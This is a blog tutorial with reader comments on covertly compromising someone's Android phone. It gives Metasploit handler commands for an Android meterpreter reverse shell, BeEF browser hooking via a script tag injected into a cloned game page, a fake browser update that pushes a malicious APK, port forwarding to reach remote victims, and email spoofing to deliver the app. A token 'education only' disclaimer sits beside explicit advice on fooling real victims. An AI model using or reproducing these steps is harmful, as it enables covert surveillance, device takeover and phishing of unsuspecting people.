Android Hacking part-2: Install apps without touching phone

As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.

I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.

If you have any problem, suggestion let me know by comments I help everyone.

Note: This is for education purpose only. Please don’t misuse it.

Requirements

  • beef
  • metasploit
  • Patience  (most of the readers don’t have patience )

Practical

We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.

After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands

service postresql start;msfconsole

It will launch Metasploit. Further commands

use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444

Remain this terminal as and follow further steps.

Launch beef. In Kali, you can start from the sidebar.launch beef in kali linux In parrot or any other security distribution, you can launch using this command.

beef-xss

Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.

As you can see in the screenshot, it asks for the username and password. These are default username and password.

beef

beef

beef default username-password

After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.

Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.hook browser example

To hook own browser visit this link http://127.0.0.1:3000/demos/basic.html or insert script tag. When you open this beef will show something like this.

hooked browser

Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.fake update for android hacking

Open a new terminal and type ifconfig to find your IP address.

In my case, it is 192.168.43.7.

To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.

Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.

In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.

fake update for android hacking

Just run this command.

service apache2 start

After this copy your android virus that you generated in the first step to /var/www/ directory. So URL of the Android virus is http://<IP>/appname.apk

I think you know how to find local IP address. Paste in URL tab of beef and click on execute.

On executing your android phone will show you something like this.

installl missing plugins (hack android phone using metasploit

If you choose Install Missing Plugins, then the app will start downloading.hack android phone

Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). installl and opening app

But we will get a meterpreter session.
session open

I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task

In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.

I found a snake script. It is the game developed using JavaScript you can download it from GitHub.

Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.

Here are simple steps to do this.

First of clone this game from Github.

git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.

It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.

<script src="http://192.168.43.60:3000/hook.js"></script>

Press ctrl+o to save ctrl+x to exit.

Now, send URL http://192.168.43.60/Snake-game/snakegame.html to your victim. You can port forward your router to perform it over the internet.

Now when our victim opens the link, he will see something like this.how to hack android phone part 2

And we will get hook that browser.  After that repeat above steps to install apps

Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing

As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.

Don’t confuse by above words there are tools and websites.

I use https://emkei.cz/ For sending spoofing emails.

This website has a straightforward interface. Just enter to, from, subject, message and send the message.

But Gmail service will catch it and move emails to spam.

In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.

Here is the screenshot of mail I send to my webmail using this website. fake email example

Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.

Problem with this method is who used webmail on the android phone, or my victim is using Gmail.

Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.

 

25 thoughts on “Android Hacking part-2: Install apps without touching phone”

  1. I was unable to create the Trojan virus it keep giving me result as an error “RangeErro” which I will later see the Trojan virus been creates on my root with 0byte contained file.

    Reply
  2. hi there . i have done all of steps sequently. step by step. but when victim tap to links , just i have core commands!!! I have no any commands else! i Have tried very much but it does not work never. please help me i have used VMware® Workstation 14 Pro. kali linux 2019 amd 64 bit
    please help

    Reply
  3. I wanna try this! im gonna fail miserably but i won’t give up, i just got a few questions….
    Does the BeEEF and metasploit method works if the person lives overseas?
    like if they click the link, would it work? or does the person needs to be on the same LAN as u?

    Reply
    • It depends if you port forward then it will work over the internet otherwise you can victim should be on same network

      Reply
  4. Nice article. This seems to a case when systems are in the same network. Can we using Beef / Rat compromise any unknown device which is not using the same wifi network. I mean in a say 4G network?

    Reply
  5. Hi,
    My name is Sony.
    Nice knowing you Harinderpreet singh.
    Then, Thankyou Bro, you are very inspiring me!
    I am a beginner. Your site is very usefull for me.
    Very awesome!
    Keep working my Bro..
    Regards,

    Reply

Leave a Comment